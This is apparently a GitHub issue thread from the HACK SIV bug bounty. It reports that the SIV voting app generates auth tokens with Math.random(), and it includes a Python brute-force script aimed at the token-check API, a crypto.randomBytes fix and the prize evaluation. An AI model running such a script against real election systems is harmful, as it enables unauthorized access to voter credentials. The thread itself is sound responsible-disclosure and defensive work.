Weak RNG in Auth Token Generation

[cjackett]

Description

The current implementation of the auth token generation function uses Math.random(), which is not a cryptographically secure random number generator (CSPRNG). This makes the generated tokens predictable and vulnerable to brute-force attacks.

Impact

Using Math.random() for generating auth tokens can lead to predictable tokens. An attacker could exploit this vulnerability to generate valid auth tokens, potentially gaining unauthorized access to the system. By analyzing a few captured tokens, an attacker can predict future tokens.

Steps to Reproduce

1. Token Generation Function:
   The current implementation generates tokens using the following logic:

   function generateOne() {
     const random = Math.random();
     const integer = String(random).slice(2);
     const hex = Number(integer).toString(16);
     const auth_token = hex.slice(0, 10);
     return auth_token;
   }

2. Exploitation Script:
   Use the following Python script to exploit the token generation vulnerability:

   import random
   import requests
   import re
   
   def is_bad_pattern(token):
       return bool(re.match(r"^[0-9][0-9]{0,6}e[0-9]{0,6}[0-9]$", token))
   
   def generate_one():
       random_number = random.random()
       integer = str(random_number)[2:]
       integer = re.sub(r'e[\+\-]?[0-9]+', '', integer)  # Avoid scientific notation issues
       hex_number = hex(int(integer))[2:]
       return hex_number[:10]
   
   def generate_auth_token():
       max_attempts = 1000
       for _ in range(max_attempts):
           auth_token = generate_one()
           if not is_bad_pattern(auth_token):
               return auth_token
       raise Exception(f"Couldn't generate good auth token with {max_attempts} attempts")
   
   def attempt_token(auth_token, election_id):
       url = "http://localhost:3000/api/check-auth-token"
       data = {
           "auth": auth_token,
           "election_id": election_id
       }
       response = requests.post(url, json=data)
       return response
   
   def main(election_id):
       while True:
           auth_token = generate_auth_token()
           response = attempt_token(auth_token, election_id)
           if response.status_code == 200:
               print(f"Valid token found: {auth_token}")
               break
           else:
               print(f"Invalid token: {auth_token} - Response: {response.status_code}")
   
   if __name__ == "__main__":
       election_id = "ADD_REAL_ELECTION_ID"
       main(election_id)

Mitigation

Replace Math.random() with a cryptographically secure random number generator, such as crypto.randomBytes in Node.js. Below is an example of a more secure token generation function:

const crypto = require('crypto');

function generateAuthToken() {
  let auth_token = generateOne();
  let attempts = 1;
  const max_attempts = 1000;
  while (isBadPatterns(auth_token)) {
    auth_token = generateOne();
    attempts++;
    if (attempts > max_attempts) throw `Couldn't generate good auth token with ${max_attempts} attempts`;
  }
  return auth_token;
}

function generateOne() {
  return crypto.randomBytes(5).toString('hex');  // 10 characters hex string
}

const isBadPatterns = (auth_token) => {
  return /^[0-9][0-9]{0,6}e[0-9]{0,6}[0-9]$/i.test(auth_token);
}

By using crypto.randomBytes, the generated tokens will be cryptographically secure, significantly reducing the risk of token prediction and brute-force attacks.

[dsernst]

Thanks for highlighting this. Previous issue about it: #143

[dsernst]

We have high priority logging and notifications on the endpoints that check Auth Tokens, to report anytime a bad auth token is used in production:

siv/pages/api/check-auth-token.ts

Lines 43 to 48 in cbae52f

	if (!voter) {
	if (auth !== exampleAuthToken)
	await pushover(
	'SIV auth token lookup miss',
	`election: ${election_id}\nbad auth: ${auth}\nPossible brute force attack?`,
	)

So can pretty confidently say no one has attempted to launch this type of attack to date.

[dsernst]

The python proof-of-concept exploit script is cool. Would love to see working code to extract the Mersenne Twister PRNG state.

But looking at that python code, it looks like it's just doing naive brute force against the API?

(That would set off our alarm code mentioned in previous comment above.)

And I think that naive approach would take a lot of attempts to get a hit!

16 hex possibilities ^ 10 digits = approx 1 trillion variations? So for an election with 10,000 voters, any random guess is about 1-in-100-million odds to hit?

---

But yes, of course we should switch to a better RNG for this! Thanks again for highlighting.

[dsernst]

(Also related to #160, which focuses on generic brute force attacks against Auth Tokens.)

[cjackett]

Apologies for not reviewing previous issues; it's good to know that this vulnerability was already on your radar.

It's reassuring to hear that you already have high-priority logging and alerts for failed auth token attempts.

Regarding the attack, yes, this was a basic brute force attempt against the API. I ran it for 24 hours without success.

Nevertheless, switching to a cryptographically secure random number generator would be a beneficial upgrade, ensuring token predictions are infeasible and significantly enhancing security.

[dsernst]

I ran it for 24 hours without success.

😮 love it

[dsernst]

Confirmed your provided mitigation code works great, and now fixed in 975f9c3.

Thanks again 🙏

Eligible for HACK SIV awards:

• Less valuable re discovering the issue, since we already had a thing tracking it (Auth token generation not using strong randomness #143).
• But highlighting it again, helping us to prioritize it, is valuable.
• And providing the very simple working mitigation code is especially appreciated.

🥂 great to have this one fixed

[dsernst]

@cjackett For HACK SIV Prizes Public Vote, are you okay with this issue being labeled "Weak RNG in Auth Token Generation"?

[arianabuilds]

Thanks again for participating!

HACK SIV Competition Submission

DEF CON 2024, August 6-11
hack.siv.org

SIV Evaluation

Type: Implementation

In Favor:

• Highlighted important security issue
• Provided clean code to fix

Against:

• We knew about it, had an open issue about it for months, but had been backlogged.
• Could only be attacked through API, not locally. Had other logging and alerting to warn if that happened. Very confident it never has.

Prize Allocation

Total: $1,133.36

• SIV: $634.92
• Public: $498.44

Payment Status

Track process on siv-org/hack.siv.org#10

Top Submission

This issue ranks among the top 5 most financially rewarded.